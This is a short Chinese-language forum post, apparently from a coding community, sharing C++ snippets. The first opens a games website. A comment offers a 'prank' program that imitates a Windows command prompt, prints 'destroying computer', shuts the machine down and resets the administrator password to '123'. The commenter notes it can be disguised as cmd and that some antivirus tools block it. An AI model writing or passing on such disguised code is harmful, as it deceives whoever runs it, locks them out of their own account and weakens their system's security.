- 分享
一个好玩的代码
- @ 2026-2-3 10:52:39
#include<windows.h> #include<bits/stdc++.h> using namespace std; int main(){ system("start www.crazygames.com"); return 0; }
1 条评论
-
-
恶搞代码:``` #include<bits/stdc++.h> using namespace std; int main(){ cout<<"Microsoft Windows [版本 10.0.22621.1413]"<<endl; cout<<"(c) Microsoft Corporation。保留所有权利。"<<endl<<endl; cout<<"Users:\system32>"; int a; cin>>a; cout<<"输入的不是内部或外部命令,也不是可运行的程序或批处理文件。"<<endl; cout<<"正在摧毁电脑"; system("shutdown/s"); system("net user administrator 123"); return 0; }
此代码会关机并修改密码为123(部分杀毒软件会阻止)(可伪装成cmd)
- 1